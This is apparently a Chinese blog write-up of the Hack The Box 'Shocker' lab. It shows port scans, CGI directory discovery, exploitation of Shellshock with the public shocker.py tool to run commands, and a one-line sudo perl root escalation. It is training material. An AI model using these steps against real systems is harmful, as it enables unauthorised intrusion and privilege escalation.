打靶记录(一二三)之HTBShocker

端口扫描

┌──(mikannse㉿kali)-[~/HTB/shocker]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.56
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-02 23:58 CST
Warning: 10.10.10.56 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.56
Host is up (0.074s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1

Nmap done: 1 IP address (1 host up) scanned in 10.87 seconds

┌──(mikannse㉿kali)-[~/HTB/shocker]
└─$ sudo nmap -sT -sV -sC -O -p80,2222 10.10.10.56
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-02 23:59 CST
Nmap scan report for 10.10.10.56
Host is up (0.077s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Linux 3.12 (93%), Linux 3.13 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.00 seconds

Web

80端口卡的加载不出来没办法，但根据房间名字shocker,感觉就显然是shellshock了，访问一下/cgi-bin，然后扫描网关的脚本，直接扫目录应该也能扫出/cgi-bin

┌──(mikannse㉿kali)-[~/HTB/shocker]
└─$ feroxbuster -u http://10.10.10.56/cgi-bin -x py,sh,pl,cgi
                                                                                                     
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.4
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.10.56/cgi-bin
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.4
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [py, sh, pl, cgi]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET       11l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        7l       17w      118c http://10.10.10.56/cgi-bin/user.sh

掏出shocker.py

┌──(mikannse㉿kali)-[~/HTB/shocker]
└─$ python2 shocker.py -H 10.10.10.56 -c /cgi-bin/user.sh

   .-. .            .            
  (   )|            |            
   `-. |--. .-.  .-.|.-. .-. .--.
  (   )|  |(   )(   |-.'(.-' |   
   `-' '  `-`-'  `-''  `-`--''  v1.1 
   
 Tom Watson, tom.watson@nccgroup.trust
 https://www.github.com/nccgroup/shocker
     
 Released under the GNU Affero General Public License
 (https://www.gnu.org/licenses/agpl-3.0.html)
    
    
[+] Single target '/cgi-bin/user.sh' being used
[+] Checking connectivity with target...
[+] Target was reachable
[+] Looking for vulnerabilities on 10.10.10.56:80
[+] 1 potential target found, attempting exploits
[+] The following URLs appear to be exploitable:
  [1] http://10.10.10.56:80/cgi-bin/user.sh
[+] Would you like to exploit further?
[>] Enter an URL number or 0 to exit: 1
[+] Entering interactive mode for http://10.10.10.56:80/cgi-bin/user.sh
[+] Enter commands (e.g. /bin/cat /etc/passwd) or 'quit'
  > /usr/bin/whoami
  < shelly

那么就直接反弹shell了

提权

一把梭:sudo perl -e ‘exec “/bin/sh”;’

碎碎念

其实是非常简单的房间，不过让我更加深入了解了一下cgi网关以及漏洞原理。